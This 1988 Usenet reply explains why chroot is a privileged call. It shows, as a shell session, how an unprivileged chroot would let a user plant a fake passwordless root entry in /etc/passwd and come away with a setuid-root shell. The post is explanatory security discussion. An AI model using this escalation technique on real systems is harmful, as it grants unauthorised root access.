Xref: utzoo news.admin:4110 news.sysadmin:1728 comp.mail.uucp:2392
Path: utzoo!attcan!uunet!pyrdc!jetson!john
From: john@jetson.UPMA.MD.US (John Owens)
Newsgroups: news.admin,news.sysadmin,comp.mail.uucp
Subject: Re: Dangerous hole in Usenet!
Message-ID: <172@jetson.UPMA.MD.US>
Date: 29 Nov 88 21:19:33 GMT
References: <1971@van-bc.UUCP> <572@comdesign.CDI.COM> <5517@medusa.cs.purdue.edu> <155@ecicrl.UUCP>
Organization: SMART HOUSE Limited Partnership
Lines: 34

In article <155@ecicrl.UUCP>, clewis@ecicrl.UUCP (Chris Lewis) writes:
> Secondly, can someone out there explain why chroot is privileged?  Or
> why /etc/chroot isn't setuid?

Hmm.

% ln /bin/su /tmp/su
% mkdir /tmp/etc
% echo root::0:0::/:/sh > /tmp/etc/passwd
% ln /bin/sh /tmp/sh
% ln /bin/chown /tmp/chown
% ln /bin/chmod /tmp/chmod
% cd /tmp
% /etc/chroot /tmp /sh
$ ./su root
# chown root sh
# chmod u+s sh
# exit
$ exit
% /tmp/sh
$ id
ruid=555 euid=0 gid=101
$ .....

[Or some variation of the above; please don't pick on details unless
they're fatal to the concept.]

In other words, chroot allows you to fool privileged programs that
rely on files with particular pathnames (/etc/passwd, /etc/group,
/etc/hosts.equiv, /usr/lib/sendmail.cf, /usr/lib/aliases, etc.).

-- 
John Owens		john@jetson.UPMA.MD.US		uunet!jetson!john
+1 301 249 6000		john%jetson.uucp@uunet.uu.net